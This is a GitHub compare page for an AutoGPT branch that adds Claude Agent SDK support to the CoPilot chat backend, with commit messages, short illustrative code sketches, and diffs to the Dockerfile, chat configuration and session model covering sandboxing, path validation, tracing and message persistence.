Compare commits


63 Commits

Author SHA1 Message Date
Zamil Majdy
744fc59c18 fix(chat/sdk): validate proxy URL before blanking ANTHROPIC_API_KEY
Only override ANTHROPIC_API_KEY="" when both a valid base_url (starts
with http) and api_key are configured. Otherwise fall back to SDK
default credentials so direct Anthropic usage still works.
2026-02-12 13:37:59 +04:00
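A minimal sketch of that guard, assuming a hypothetical `build_sdk_env` helper (the function name and shape are illustrative, not the actual code; the env var names come from the OpenRouter-routing commit below):

```python
def build_sdk_env(base_url: str | None, api_key: str | None) -> dict[str, str]:
    """Return env overrides for the SDK CLI, or {} to keep default credentials."""
    if base_url and base_url.startswith("http") and api_key:
        return {
            "ANTHROPIC_BASE_URL": base_url,    # route CLI calls through the proxy
            "ANTHROPIC_AUTH_TOKEN": api_key,   # proxy credential
            "ANTHROPIC_API_KEY": "",           # blank only when the proxy config is valid
        }
    # Otherwise leave the environment untouched so the SDK's default
    # Anthropic credentials still work for direct usage.
    return {}
```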
Zamil Majdy
58847cd242 refactor(chat): rename sdk_ config prefix to claude_agent_ for clarity
Also adds gt=0 validation on claude_agent_max_budget_usd per PR review.
2026-02-12 13:36:48 +04:00
Zamil Majdy
d8453bb304 feat(chat/sdk): route SDK through OpenRouter with model config and usage tracking
- Add sdk_model and sdk_max_budget_usd config fields for SDK-specific settings
- Route SDK CLI API calls through OpenRouter via env vars (ANTHROPIC_BASE_URL,
  ANTHROPIC_AUTH_TOKEN) for per-call token/cost tracking
- Pass model, env, user, and max_budget_usd to ClaudeAgentOptions
- Emit StreamUsage from ResultMessage in response adapter
- Persist token usage to session.usage in SDK streaming loop
- Fix tracing to use configured model instead of hardcoded default
- Update Anthropic fallback to use config.api_key/base_url (OpenRouter routing)
2026-02-12 13:12:42 +04:00
Zamil Majdy
d7f7a2747f fix(backend/chat): Atomic message append to prevent race condition
Replace the read-modify-write pattern in stream_chat_post with an
atomic append_and_save_message helper that acquires the session lock
before re-fetching and appending. This prevents message loss when
concurrent requests modify the same session.
2026-02-12 09:10:43 +04:00
Zamil Majdy
68849e197c format 2026-02-12 08:26:26 +04:00
Zamil Majdy
211478bb29 Revert "style: run ruff format and isort"
This reverts commit 40b58807ab.
2026-02-12 08:25:22 +04:00
Zamil Majdy
0e88dd15b2 feat(chat): add hook-based tracing integration for Claude Agent SDK
- Add create_tracing_hooks() for fine-grained tool timing
- Add merge_hooks() utility to combine security + tracing hooks
- Captures precise pre/post timing for tool executions
- Tracks tool failures via PostToolUseFailure hook
- Integrates seamlessly with existing security hooks
2026-02-12 03:35:16 +00:00
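A plausible shape for the `merge_hooks()` utility named above, assuming hooks are plain mappings from event name to a list of callbacks (the real SDK hook types may differ):

```python
from typing import Any, Callable

Hook = Callable[..., Any]

def merge_hooks(*hook_maps: dict[str, list[Hook]]) -> dict[str, list[Hook]]:
    """Combine several hook mappings so security and tracing hooks both run."""
    merged: dict[str, list[Hook]] = {}
    for hooks in hook_maps:
        for event, callbacks in hooks.items():
            merged.setdefault(event, []).extend(callbacks)
    return merged

# e.g. merge_hooks(create_security_hooks(...), create_tracing_hooks(...))
```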
Zamil Majdy
7f3c227f0a feat(chat): add modular Langfuse tracing for Claude Agent SDK
- Create tracing.py with TracedSession context manager
- Automatically trace user messages, SDK messages, and results
- Capture tool calls with input/output and timing
- Log usage and cost from SDK ResultMessage
- No-op when Langfuse not configured (zero overhead)
- Clean integration into service.py via context manager
2026-02-12 03:33:37 +00:00
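The "no-op when Langfuse is not configured" behaviour is essentially an async context manager that yields `None` and skips all client calls; a sketch under that assumption (the client calls are hypothetical, not the actual Langfuse API usage):

```python
from contextlib import asynccontextmanager
from typing import Any, AsyncIterator

@asynccontextmanager
async def traced_session(session_id: str, client: Any | None) -> AsyncIterator[Any | None]:
    if client is None:
        # Tracing disabled: yield immediately, create nothing, flush nothing.
        yield None
        return
    trace = client.trace(name="copilot-session", session_id=session_id)  # hypothetical client call
    try:
        yield trace
    finally:
        client.flush()  # make sure buffered events are sent when the session ends
```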
Zamil Majdy
40b58807ab style: run ruff format and isort 2026-02-12 03:25:19 +00:00
Zamil Majdy
d0e2e6f013 security(service): strengthen path validation for SDK cleanup
- Add empty check after session_id sanitization
- Add assertion for defense-in-depth
- Add explicit '..' traversal check in cleanup
- Replace glob with os.listdir to avoid glob injection
- Add validation that project_dir stays under ~/.claude/projects
- Add warning logs for rejected paths

Addresses CodeQL alert about uncontrolled data in path expression
2026-02-12 03:07:08 +00:00
Zamil Majdy
efdc8d73cc fix(security_hooks): use json.dumps for pattern matching and log warning
- Use json.dumps instead of str() for more predictable pattern matching
- Log warning when SDK not available and security hooks are disabled

Addresses CodeRabbit review feedback
2026-02-12 02:55:04 +00:00
Zamil Majdy
a34810d8a2 revert: remove Bash command extraction from GenericTool
Keep it simple: just show 'Bash completed' instead of special-casing
the extraction of command names like 'jq completed'
2026-02-12 02:53:37 +00:00
Zamil Majdy
038b7d5841 feat(copilot): show specific command name for Bash tool
- Extract command name (jq, grep, etc.) from Bash tool input
- Display 'jq completed' instead of 'Bash completed'
- Add ripgrep and tree to Dockerfile (match ALLOWED_BASH_COMMANDS)
2026-02-12 02:48:19 +00:00
Zamil Majdy
cac93b0cc9 fix(chat): increase SDK buffer limit and add jq
- Add sdk_max_buffer_size config option (default 10MB, was 1MB)
- Pass max_buffer_size to ClaudeAgentOptions to prevent crashes on large tool outputs
- Install jq in Dockerfile for JSON processing capabilities

Fixes AUTOGPT-SERVER-7V2
2026-02-12 02:41:12 +00:00
Zamil Majdy
2025aaf5f2 fix(backend/chat): Preserve full MCP tool output for frontend widgets
The SDK CLI truncates large tool results (writing them to disk),
which breaks frontend widget rendering (e.g., find_block's block
list cards). Stash the full MCP tool output before the SDK sees it,
then use the stash in the response adapter so the frontend always
receives the complete JSON for proper widget parsing.
2026-02-11 23:13:42 +04:00
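The stash pairs with the `pop_pending_tool_output()` call visible in the response adapter diff below; a simplified sketch, assuming a module-level dict keyed by tool name (the real keying and the `stash_tool_output` name may differ):

```python
_pending_tool_outputs: dict[str, str] = {}

def stash_tool_output(tool_name: str, output: str) -> None:
    """Record the full MCP tool output before the SDK CLI can truncate it."""
    _pending_tool_outputs[tool_name] = output

def pop_pending_tool_output(tool_name: str) -> str | None:
    """Return and clear the stashed output so the adapter sends the complete JSON."""
    return _pending_tool_outputs.pop(tool_name, None)
```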
Zamil Majdy
ae9bce3bae feat(backend/chat): Add sandboxed Bash and notify SDK of restrictions
- Allow Bash tool with command allowlist (jq, grep, head, tail, etc.)
  validated via shlex.split for proper quote handling
- Add workspace path validation for Bash absolute paths
- Add SDK built-in tools (Read/Write/Edit/Glob/Grep/Bash) to allowed_tools
- Append Bash restrictions to system prompt (SDK doesn't know our allowlist)
- Add default_factory to BlockInfoSummary schema fields
- Add 12 Bash sandbox tests covering safe/dangerous commands, substitution,
  redirection, /dev/ access, path escaping
2026-02-11 22:35:39 +04:00
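A sketch of the allowlist check, assuming a hypothetical validator (the real ALLOWED_BASH_COMMANDS set lives in security_hooks.py and is larger than shown):

```python
import shlex

ALLOWED_BASH_COMMANDS = {"jq", "grep", "head", "tail"}  # subset for illustration

def is_bash_command_allowed(command: str) -> bool:
    """Allow only plain invocations of allowlisted binaries."""
    # Reject substitution, chaining, and redirection outright.
    if any(token in command for token in ("$(", "`", "|", ";", "&", ">", "<")):
        return False
    try:
        argv = shlex.split(command)  # proper quote handling
    except ValueError:
        return False                 # e.g. unbalanced quotes
    return bool(argv) and argv[0] in ALLOWED_BASH_COMMANDS
```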
Zamil Majdy
3107d889fc feat(frontend/copilot): Add generic tool widget for unrecognized tools
SDK built-in tools (Read, Glob, Grep, etc.) have no dedicated frontend
widget, so tool calls silently disappeared. Add a GenericTool component
that shows a spinning gear + "Running {tool}…" for any tool-* part
type that doesn't match a known case.
2026-02-11 22:08:03 +04:00
Zamil Majdy
f174fb6303 fix(backend/chat): Strip MCP prefix from SDK tool names for frontend rendering
The Vercel AI SDK frontend renders tool widgets based on tool name
(e.g. "tool-find_block", "tool-run_agent"). The SDK sends tool names
with the MCP prefix (mcp__copilot__find_block) which didn't match
any frontend switch case, causing tool execution to be invisible.

Strip the mcp__copilot__ prefix in the response adapter so tool events
reach the correct frontend widget handlers.
2026-02-11 22:01:59 +04:00
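The fix is a straightforward prefix strip (the `MCP_TOOL_PREFIX` constant appears in the adapter diff below):

```python
MCP_TOOL_PREFIX = "mcp__copilot__"

tool_name = "mcp__copilot__find_block".removeprefix(MCP_TOOL_PREFIX)
assert tool_name == "find_block"  # now matches the frontend's "tool-find_block" case
```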
Zamil Majdy
920a4c5f15 feat(backend/chat): Allow Read/Write/Edit/Glob/Grep in SDK within workspace
Move these tools from fully-blocked to workspace-scoped: they are now
allowed when the file path stays within the SDK working directory
(/tmp/copilot-<session>/) or the tool-results directory
(~/.claude/projects/…/tool-results/). This enables the SDK's built-in
oversized tool result handling and workspace file operations.

- Add _validate_workspace_path() with normpath-based path validation
- Pass sdk_cwd from service.py into create_security_hooks()
- Add 20 unit tests covering allowed/denied paths, traversal attacks
2026-02-11 20:39:33 +04:00
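A minimal sketch of the normpath-based check, assuming `workspace` is already an absolute, normalized directory (the real `_validate_workspace_path()` also covers the tool-results directory):

```python
import os

def is_within_workspace(path: str, workspace: str) -> bool:
    """Resolve the candidate path and require it to stay under the workspace root."""
    resolved = os.path.normpath(os.path.join(workspace, path))
    return resolved == workspace or resolved.startswith(workspace + os.sep)
```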
Zamil Majdy
e95fadbb86 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-11 20:23:56 +04:00
Zamil Majdy
b14b3803ad feat(backend/chat): Add StreamStartStep/StreamFinishStep to SDK adapter
The non-SDK path emits step boundaries (StartStep/FinishStep) around
each LLM turn and tool cycle. The SDK adapter was missing these,
causing the frontend to lack visual step framing for tool calls.

Now the SDK adapter emits:
- StreamStartStep after init and before each new LLM turn
- StreamFinishStep after tool results and before final finish
2026-02-11 20:18:27 +04:00
Zamil Majdy
82c483d6c8 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-11 07:17:38 +04:00
Zamil Majdy
7cffa1895f fix(backend/chat): Filter duplicate StreamStart from non-SDK path
Routes.py already publishes a StreamStart before calling the service.
The SDK path filters the duplicate internally, but the non-SDK path
did not, causing two StreamStart events to reach the frontend.
2026-02-11 06:52:47 +04:00
Zamil Majdy
9791bdd724 fix(backend/chat): Use normpath+startswith pattern for CodeQL path sanitization
CodeQL doesn't recognize re.sub as a path sanitizer. Switch to the
os.path.normpath + startswith prefix check pattern that CodeQL's
taint model explicitly recognizes as breaking the taint chain.
2026-02-11 06:45:12 +04:00
Zamil Majdy
750a674c78 fix lock 2026-02-11 06:39:03 +04:00
Zamil Majdy
960c7980a3 fix(backend/chat): Use named helper for session_id sanitization to satisfy CodeQL
Replace inline comprehension with _sanitize_session_id() using re.sub
so CodeQL recognizes the path-traversal sanitization barrier.
2026-02-11 06:32:16 +04:00
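The named helper is a one-line re.sub barrier; a sketch, with the exact character class being an assumption:

```python
import re

def _sanitize_session_id(session_id: str) -> str:
    """Strip anything that is not a safe path-component character."""
    return re.sub(r"[^A-Za-z0-9_-]", "", session_id)
```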
Zamil Majdy
e85d437bb2 fix(backend/chat): Sanitize session_id in SDK cwd path to prevent path traversal 2026-02-11 06:26:48 +04:00
Zamil Majdy
44f9536bd6 fix lock 2026-02-11 06:24:41 +04:00
Zamil Majdy
1c1085a227 Merge remote-tracking branch 'origin/dev' into feat/copitlot-claude-code
# Conflicts:
#	autogpt_platform/backend/backend/api/features/chat/config.py
#	autogpt_platform/backend/poetry.lock
2026-02-11 05:30:46 +04:00
Zamil Majdy
d7ef70469e fix(backend/chat): Fix cleanup race condition and move to outer finally
- Use session-specific temp dir (/tmp/copilot-{session_id}) as SDK cwd
  to prevent concurrent sessions from deleting each other's tool-result
  files during cleanup
- Move _cleanup_sdk_tool_results() to outer finally block so it runs
  even when the outer except Exception fires
- Clean up the temp cwd directory after each session
- Remove unnecessary inner try/finally nesting
2026-02-11 05:13:02 +04:00
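The per-session working directory plus outer-finally cleanup looks roughly like this (a sketch; the real code also removes the SDK's tool-result files):

```python
import os
import shutil
import tempfile

async def run_sdk_turn(session_id: str) -> None:
    sdk_cwd = os.path.join(tempfile.gettempdir(), f"copilot-{session_id}")  # per-session dir
    os.makedirs(sdk_cwd, exist_ok=True)
    try:
        ...  # drive the Claude Agent SDK with cwd=sdk_cwd
    finally:
        # Runs even if the SDK call raises, and only touches this session's dir,
        # so concurrent sessions cannot delete each other's files.
        shutil.rmtree(sdk_cwd, ignore_errors=True)
```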
Zamil Majdy
1926127ddd fix(backend/chat): Fix bugs and remove dead code in SDK integration
- Fix message accumulation bug: reset has_appended_assistant when
  creating new post-tool assistant message to prevent lost text deltas
- Fix hardcoded model in anthropic_fallback.py: use config.model instead
  of hardcoded "claude-sonnet-4-20250514"
- Fix _SDK_TOOL_RESULTS_DIR using hardcoded /root/ path: use expanduser
- Remove unused create_strict_security_hooks (~75 lines)
- Remove unused create_heartbeat/create_usage from response adapter
- Remove unused RAW_TOOL_NAMES from tool_adapter
- Extract _MAX_TOOL_ITERATIONS constant from magic number
2026-02-11 04:42:05 +04:00
Zamil Majdy
8b509e56de refactor(backend/chat): Replace --resume with conversation context, add compaction and dedup
- Remove broken --resume/session file approach (CLI v2.1.38 can't load
  >2 message session files) and delete session_file.py + tests
- Embed prior conversation turns as <conversation_history> context in
  the user message for multi-turn memory
- Add context compaction using shared compress_context() from prompt.py
  with LLM summarization + truncation fallback for long conversations
- Reuse _build_system_prompt and _generate_session_title from parent
  service.py instead of duplicating (gains Langfuse prompt support)
- Add has_conversation_history param to _build_system_prompt to avoid
  greeting on multi-turn conversations
- Fix _SDK_TOOL_RESULTS_GLOB from hardcoded /root/ to expanduser ~/
2026-02-11 04:22:11 +04:00
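Embedding prior turns as context looks roughly like this (the tag name comes from the commit; the inner formatting and helper name are assumptions):

```python
def embed_history(prior_turns: list[tuple[str, str]], user_message: str) -> str:
    """Prepend earlier (role, text) turns so the SDK sees multi-turn context."""
    history = "\n".join(f"{role}: {text}" for role, text in prior_turns)
    return (
        "<conversation_history>\n"
        f"{history}\n"
        "</conversation_history>\n\n"
        f"{user_message}"
    )
```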
Zamil Majdy
acb2d0bd1b fix(backend/chat): Resolve symlinks in session file path for --resume
The CLI resolves symlinks when computing its project directory (e.g.
/tmp -> /private/tmp on macOS), so our session file writes must use
the resolved path to match. Also adds cwd to ClaudeAgentOptions and
debug logging for SDK messages.
2026-02-10 20:11:16 +04:00
Zamil Majdy
51aa369c80 fix(backend): Restore PyYAML cp38 wheel entries in poetry.lock
Re-add Python 3.8 wheel entries for PyYAML that were dropped by
poetry lock resolution, keeping the lockfile consistent with dev.
2026-02-10 20:06:45 +04:00
Zamil Majdy
6403ffe353 fix(backend/chat): Use --resume with session files for multi-turn conversations
Replace broken AsyncIterable approach (CLI rejects assistant-type stdin
messages) with JSONL session files written to the CLI's storage directory.
This enables --resume to load full user+assistant context with turn-level
compaction support for long conversations.
2026-02-10 18:46:33 +04:00
Zamil Majdy
c40a98ba3c Merge branches 'feat/copitlot-claude-code' and 'dev' of github.com:Significant-Gravitas/AutoGPT into feat/copitlot-claude-code 2026-02-10 18:19:23 +04:00
Zamil Majdy
a31fc8b162 refactor(backend/chat): Use proper SDK types and in-memory conversation history
Replace duck typing (class name checks, getattr) with isinstance() using
SDK-exported dataclasses. Replace file-based --resume with AsyncIterable
message injection for conversation history, eliminating disk I/O. Add 15
unit tests for the response adapter.
2026-02-10 18:17:00 +04:00
Zamil Majdy
0f2d1a6553 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-10 17:23:06 +04:00
Zamil Majdy
87d817b83b fix(backend/chat): Allow MCP-registered tools through security hook and fix title generation
- Skip BLOCKED_TOOLS check for tools with mcp__copilot__ prefix since they
  are already sandboxed by tool_adapter (fixes Read tool being blocked)
- Fall back to session.messages for title generation when message=None
2026-02-10 17:15:42 +04:00
Zamil Majdy
acf932bf4f refactor(backend/chat): Move glob/os imports to top-level in SDK service 2026-02-10 16:57:11 +04:00
Zamil Majdy
f562d9a277 fix(backend/chat): Add Read tool for SDK oversized tool results
The Claude Agent SDK saves tool results exceeding its token limit to
files and instructs the agent to read them back with a Read tool. Our
MCP server didn't have this tool, breaking the agent on large results
like run_block output (117K+ chars).

Changes:
- Add a Read tool to the MCP server (restricted to /root/.claude/)
- Register it in COPILOT_TOOL_NAMES so the SDK can use it
- Add safety-net truncation at 500K chars for extreme cases
- Clean up SDK tool-result files after each client session
2026-02-10 16:53:04 +04:00
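The 500K safety net is a plain length cap; a sketch (the helper name and truncation marker text are assumptions):

```python
MAX_TOOL_RESULT_CHARS = 500_000  # safety net for extreme cases

def truncate_tool_result(output: str) -> str:
    if len(output) <= MAX_TOOL_RESULT_CHARS:
        return output
    return output[:MAX_TOOL_RESULT_CHARS] + "\n... [truncated]"
```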
Zamil Majdy
3c92a96504 fix(backend/chat): Publish StreamError before StreamFinish on error paths
When run_ai_generation() or event_generator() encounter errors, they
were only publishing StreamFinish without a preceding StreamError. The
frontend treats finish-without-error as normal completion, leaving the
user with an apparently stuck/empty response requiring a page refresh.
2026-02-10 15:49:23 +04:00
Zamil Majdy
8b8e1df739 fix(backend/chat): Auto-expire stale running tasks to unblock sessions
Tasks stuck in "running" status beyond stream_timeout (300s) are now
auto-marked as failed when looked up, preventing zombie tasks from
blocking the session indefinitely.
2026-02-10 15:35:43 +04:00
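The auto-expiry is a lazy check performed when the task is looked up; a sketch assuming a hypothetical task record with `status` and `started_at` fields:

```python
import time

STREAM_TIMEOUT_SECONDS = 300  # mirrors config.stream_timeout

def expire_if_stale(task: dict) -> dict:
    """Mark a long-stuck 'running' task as failed so it stops blocking the session."""
    started_at = task.get("started_at", 0.0)
    if task.get("status") == "running" and time.time() - started_at > STREAM_TIMEOUT_SECONDS:
        task["status"] = "failed"
    return task
```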
Zamil Majdy
602a0a4fb1 fix(backend/chat): Strip tool call noise from conversation history context 2026-02-10 14:11:27 +04:00
Zamil Majdy
8d7d531ae0 refactor(backend/chat): Remove unused max_context_messages config 2026-02-10 13:57:33 +04:00
Zamil Majdy
43153a12e0 fix(backend/chat): Remove manual context truncation from SDK path, let SDK handle compaction 2026-02-10 13:52:49 +04:00
Zamil Majdy
587e11c60a refactor(backend/chat): Extract MCP server name constants to avoid hardcoded strings 2026-02-10 12:12:08 +04:00
Zamil Majdy
57da545e02 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-10 12:10:35 +04:00
Zamil Majdy
626980bf27 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-09 19:26:52 +04:00
Swifty
e42b27af3c Merge branch 'dev' into feat/copitlot-claude-code 2026-02-09 09:12:23 +01:00
Zamil Majdy
34face15d2 fix lock 2026-02-09 11:45:59 +04:00
Zamil Majdy
7d32c83f95 fix(backend/chat): Handle non-serializable SDK objects in tool result output 2026-02-09 10:59:50 +04:00
Zamil Majdy
6e2a45b84e style(backend): Remove unused pytest import in execution_queue_test 2026-02-09 10:14:20 +04:00
Zamil Majdy
32f6532e9c Merge branch 'dev' of github.com:Significant-Gravitas/AutoGPT into feat/copitlot-claude-code 2026-02-09 10:10:32 +04:00
Zamil Majdy
0bbe8a184d Merge dev and resolve poetry.lock conflict 2026-02-08 19:40:17 +04:00
Zamil Majdy
7592deed63 fix(backend/chat): Address remaining PR review comments
- Fix tool_call_id always being "sdk-call" by generating unique IDs per invocation
- Fix validation using original tool_name instead of clean_name in security hooks
- Fix duplicate StreamFinish in Anthropic fallback path
- Fix ImportError fallback returning plain dict instead of re-raising
- Extract _build_input_schema helper to deduplicate schema construction
- Add else branch for unhandled SDK message types for observability
- Truncate large tool results in conversation history to prevent context overflow
2026-02-08 19:39:10 +04:00
Zamil Majdy
b9c759ce4f fix(backend/chat): Address additional PR review comments
- Add terminal StreamFinish in adapt_sdk_stream if SDK ends without one
- Sanitize error message in adapt_sdk_stream exception handler
- Pass full JSON schema (type, properties, required) to tool decorator
2026-02-08 07:14:45 +04:00
Zamil Majdy
5efb80d47b fix(backend/chat): Address PR review comments for Claude SDK integration
- Add StreamFinish after ErrorMessage in response adapter
- Fix str.replace to removeprefix in security hooks
- Apply max_context_messages limit as safety guard in history formatting
- Add empty prompt guard before sending to SDK
- Sanitize error messages to avoid exposing internal details
- Fix fire-and-forget asyncio.create_task by storing task reference
- Fix tool_calls population on assistant messages
- Rewrite Anthropic fallback to persist messages and merge consecutive roles
- Only use ANTHROPIC_API_KEY for fallback (not OpenRouter keys)
- Fix IndexError when tool result content list is empty
2026-02-06 13:25:10 +04:00
Zamil Majdy
b49d8e2cba fix lock 2026-02-06 13:19:53 +04:00
Zamil Majdy
452544530d feat(chat/sdk): Enable native SDK context compaction
- Remove manual truncation in conversation history formatting
- SDK's automatic compaction handles context limits intelligently
- Add observability hooks:
  - PreCompact: Log when SDK triggers context compaction
  - PostToolUse: Log successful tool executions
  - PostToolUseFailure: Log and debug failed tool executions
- Update config: increase max_context_messages (SDK handles compaction)
2026-02-06 12:44:48 +04:00
Zamil Majdy
32ee7e6cf8 fix(chat): Remove aggressive stale task detection
The 60-second timeout was too aggressive and could incorrectly mark
legitimate long-running tool calls as stale. Relying on Redis TTL
(1 hour) for cleanup is sufficient and more reliable.
2026-02-06 11:45:54 +04:00
Zamil Majdy
670663c406 Merge dev and resolve poetry.lock conflict 2026-02-06 11:40:41 +04:00
Zamil Majdy
0dbe4cf51e feat(backend/chat): Add Claude Agent SDK integration for CoPilot
This PR adds the Claude Agent SDK as the default backend for CoPilot chat completions,
replacing the direct OpenAI API integration.

Key changes:
- Add Claude Agent SDK service layer with MCP tool adapter
- Fix message persistence after tool calls (messages no longer disappear on refresh)
- Add OpenRouter tracing for session title generation
- Add security hooks for user context validation
- Add Anthropic fallback when SDK is not available
- Clean up excessive debug logging
2026-02-06 11:38:17 +04:00
89 changed files with 15385 additions and 454 deletions

View File

@@ -62,12 +62,16 @@ ENV POETRY_HOME=/opt/poetry \
DEBIAN_FRONTEND=noninteractive
ENV PATH=/opt/poetry/bin:$PATH
# Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use
# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
RUN apt-get update && apt-get install -y \
python3.13 \
python3-pip \
ffmpeg \
imagemagick \
jq \
ripgrep \
tree \
&& rm -rf /var/lib/apt/lists/*
# Copy only necessary files from builder

View File

@@ -27,12 +27,11 @@ class ChatConfig(BaseSettings):
session_ttl: int = Field(default=43200, description="Session TTL in seconds")
# Streaming Configuration
max_context_messages: int = Field(
default=50, ge=1, le=200, description="Maximum context messages"
)
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
max_retries: int = Field(default=3, description="Maximum number of retries")
max_retries: int = Field(
default=3,
description="Max retries for fallback path (SDK handles retries internally)",
)
max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
max_agent_schedules: int = Field(
default=30, description="Maximum number of agent schedules"
@@ -93,6 +92,27 @@ class ChatConfig(BaseSettings):
description="Name of the prompt in Langfuse to fetch",
)
# Claude Agent SDK Configuration
use_claude_agent_sdk: bool = Field(
default=True,
description="Use Claude Agent SDK for chat completions",
)
claude_agent_model: str | None = Field(
default=None,
description="Model for the Claude Agent SDK path. If None, derives from "
"the `model` field by stripping the OpenRouter provider prefix.",
)
claude_agent_max_budget_usd: float | None = Field(
default=None,
gt=0,
description="Max budget in USD per Claude Agent SDK session (None = unlimited)",
)
claude_agent_max_buffer_size: int = Field(
default=10 * 1024 * 1024, # 10MB (default SDK is 1MB)
description="Max buffer size in bytes for Claude Agent SDK JSON message parsing. "
"Increase if tool outputs exceed the limit.",
)
# Extended thinking configuration for Claude models
thinking_enabled: bool = Field(
default=True,
@@ -138,6 +158,17 @@ class ChatConfig(BaseSettings):
v = os.getenv("CHAT_INTERNAL_API_KEY")
return v
@field_validator("use_claude_agent_sdk", mode="before")
@classmethod
def get_use_claude_agent_sdk(cls, v):
"""Get use_claude_agent_sdk from environment if not provided."""
# Check environment variable - default to True if not set
env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
if env_val:
return env_val in ("true", "1", "yes", "on")
# Default to True (SDK enabled by default)
return True if v is None else v
# Prompt paths for different contexts
PROMPT_PATHS: dict[str, str] = {
"default": "prompts/chat_system.md",

View File

@@ -2,7 +2,7 @@ import asyncio
import logging
import uuid
from datetime import UTC, datetime
from typing import Any, cast
from typing import Any
from weakref import WeakValueDictionary
from openai.types.chat import (
@@ -104,26 +104,6 @@ class ChatSession(BaseModel):
successful_agent_runs: dict[str, int] = {}
successful_agent_schedules: dict[str, int] = {}
def add_tool_call_to_current_turn(self, tool_call: dict) -> None:
"""Attach a tool_call to the current turn's assistant message.
Searches backwards for the most recent assistant message (stopping at
any user message boundary). If found, appends the tool_call to it.
Otherwise creates a new assistant message with the tool_call.
"""
for msg in reversed(self.messages):
if msg.role == "user":
break
if msg.role == "assistant":
if not msg.tool_calls:
msg.tool_calls = []
msg.tool_calls.append(tool_call)
return
self.messages.append(
ChatMessage(role="assistant", content="", tool_calls=[tool_call])
)
@staticmethod
def new(user_id: str) -> "ChatSession":
return ChatSession(
@@ -192,47 +172,6 @@ class ChatSession(BaseModel):
successful_agent_schedules=successful_agent_schedules,
)
@staticmethod
def _merge_consecutive_assistant_messages(
messages: list[ChatCompletionMessageParam],
) -> list[ChatCompletionMessageParam]:
"""Merge consecutive assistant messages into single messages.
Long-running tool flows can create split assistant messages: one with
text content and another with tool_calls. Anthropic's API requires
tool_result blocks to reference a tool_use in the immediately preceding
assistant message, so these splits cause 400 errors via OpenRouter.
"""
if len(messages) < 2:
return messages
result: list[ChatCompletionMessageParam] = [messages[0]]
for msg in messages[1:]:
prev = result[-1]
if prev.get("role") != "assistant" or msg.get("role") != "assistant":
result.append(msg)
continue
prev = cast(ChatCompletionAssistantMessageParam, prev)
curr = cast(ChatCompletionAssistantMessageParam, msg)
curr_content = curr.get("content") or ""
if curr_content:
prev_content = prev.get("content") or ""
prev["content"] = (
f"{prev_content}\n{curr_content}" if prev_content else curr_content
)
curr_tool_calls = curr.get("tool_calls")
if curr_tool_calls:
prev_tool_calls = prev.get("tool_calls")
prev["tool_calls"] = (
list(prev_tool_calls) + list(curr_tool_calls)
if prev_tool_calls
else list(curr_tool_calls)
)
return result
def to_openai_messages(self) -> list[ChatCompletionMessageParam]:
messages = []
for message in self.messages:
@@ -319,7 +258,7 @@ class ChatSession(BaseModel):
name=message.name or "",
)
)
return self._merge_consecutive_assistant_messages(messages)
return messages
async def _get_session_from_cache(session_id: str) -> ChatSession | None:
@@ -334,9 +273,8 @@ async def _get_session_from_cache(session_id: str) -> ChatSession | None:
try:
session = ChatSession.model_validate_json(raw_session)
logger.info(
f"Loading session {session_id} from cache: "
f"message_count={len(session.messages)}, "
f"roles={[m.role for m in session.messages]}"
f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
f"last_roles={[m.role for m in session.messages[-3:]]}" # Last 3 roles
)
return session
except Exception as e:
@@ -378,11 +316,9 @@ async def _get_session_from_db(session_id: str) -> ChatSession | None:
return None
messages = prisma_session.Messages
logger.info(
f"Loading session {session_id} from DB: "
f"has_messages={messages is not None}, "
f"message_count={len(messages) if messages else 0}, "
f"roles={[m.role for m in messages] if messages else []}"
logger.debug(
f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
f"roles={[m.role for m in messages[-3:]] if messages else []}" # Last 3 roles
)
return ChatSession.from_db(prisma_session, messages)
@@ -433,10 +369,9 @@ async def _save_session_to_db(
"function_call": msg.function_call,
}
)
logger.info(
f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
f"roles={[m['role'] for m in messages_data]}, "
f"start_sequence={existing_message_count}"
logger.debug(
f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
f"roles={[m['role'] for m in messages_data]}"
)
await chat_db.add_chat_messages_batch(
session_id=session.session_id,
@@ -476,7 +411,7 @@ async def get_chat_session(
logger.warning(f"Unexpected cache error for session {session_id}: {e}")
# Fall back to database
logger.info(f"Session {session_id} not in cache, checking database")
logger.debug(f"Session {session_id} not in cache, checking database")
session = await _get_session_from_db(session_id)
if session is None:
@@ -493,7 +428,6 @@ async def get_chat_session(
# Cache the session from DB
try:
await _cache_session(session)
logger.info(f"Cached session {session_id} from database")
except Exception as e:
logger.warning(f"Failed to cache session {session_id}: {e}")
@@ -558,6 +492,40 @@ async def upsert_chat_session(
return session
async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
"""Atomically append a message to a session and persist it.
Acquires the session lock, re-fetches the latest session state,
appends the message, and saves — preventing message loss when
concurrent requests modify the same session.
"""
lock = await _get_session_lock(session_id)
async with lock:
session = await get_chat_session(session_id)
if session is None:
raise ValueError(f"Session {session_id} not found")
session.messages.append(message)
existing_message_count = await chat_db.get_chat_session_message_count(
session_id
)
try:
await _save_session_to_db(session, existing_message_count)
except Exception as e:
raise DatabaseError(
f"Failed to persist message to session {session_id}"
) from e
try:
await _cache_session(session)
except Exception as e:
logger.warning(f"Cache write failed for session {session_id}: {e}")
return session
async def create_chat_session(user_id: str) -> ChatSession:
"""Create a new chat session and persist it.
@@ -664,13 +632,19 @@ async def update_session_title(session_id: str, title: str) -> bool:
logger.warning(f"Session {session_id} not found for title update")
return False
# Invalidate cache so next fetch gets updated title
# Update title in cache if it exists (instead of invalidating).
# This prevents race conditions where cache invalidation causes
# the frontend to see stale DB data while streaming is still in progress.
try:
redis_key = _get_session_cache_key(session_id)
async_redis = await get_redis_async()
await async_redis.delete(redis_key)
cached = await _get_session_from_cache(session_id)
if cached:
cached.title = title
await _cache_session(cached)
except Exception as e:
